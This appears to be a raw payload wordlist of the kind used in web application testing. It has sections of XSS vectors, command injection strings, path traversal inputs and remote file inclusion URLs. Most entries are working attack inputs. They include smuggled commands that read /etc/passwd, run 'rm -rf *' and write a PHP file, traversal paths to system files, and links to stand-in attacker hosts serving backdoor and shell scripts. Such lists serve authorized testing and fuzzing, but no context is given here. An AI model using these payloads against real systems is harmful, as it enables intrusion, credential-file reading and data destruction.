# XSS
<script>alert('XSS');</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<iframe src="javascript:alert('XSS');"></iframe>
<svg onload="document.write('XSS')"></svg>
<marquee><b>Test</b></marquee>
<svg/onload=alert(String.fromCharCode(88,83,83))>
<img src="javascript:alert('XSS');">
<body onload="alert('XSS')">
<iframe src="javascript:alert('XSS');"></iframe>
<img src="javascript:alert('XSS')">
<svg onload="javascript:alert(1)">
<svg><script>alert('XSS')</script>
<svg onload="alert('XSS')">
<img src="javascript:alert('XSS')">
<svg/onload=alert('XSS')>
<a href="javascript:alert('XSS');">Click me</a>
<svg/onload="document.write('<img src=x onerror=alert(1)>')">
<iframe/onload=alert(1)>
<img src="javascript:alert('XSS')">
<svg><script>alert('XSS')</script>
<iframe src="javascript:alert('XSS');"></iframe>
<a href="javascript:alert('XSS');">Click me</a>
<svg/onload=alert(1)>
<svg onload="alert('XSS')">
<svg/onload=alert(1)>
<iframe onload=alert(1)>
<svg onload=alert(1)>
<a href="javascript:alert('XSS');">Click me</a>
<svg/onload="alert('XSS')">
<svg/onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert('XSS')">
<svg/onload=alert(1)>
<iframe src="javascript:alert('XSS');"></iframe>

# Command Injection
; ls
&& cat /etc/passwd
| whoami
; cat /etc/passwd
| pwd
; rm -rf *
& echo "Hacked"
& echo "Hacked" > hacked.txt
; echo '<?php phpinfo(); ?>' > info.php

# Local File Inclusion
../../../etc/passwd
../../../etc/hosts
../../../../etc/passwd
../../../../etc/hosts
../../../../../../etc/passwd
../../../../../../etc/hosts
../../../../../../../../etc/passwd
../../../../../../../../etc/hosts
../../../../../../../../../etc/passwd
../../../../../../../../../etc/hosts

# Remote File Inclusion
http://evil.com/malicious_script.php
http://attacker.com/backdoor.php
http://hack.com/shell.php
http://exploit.com/exploit_code.txt
http://payloads.com/payloads.txt
http://vulnerable.com/vulnerable_file.php
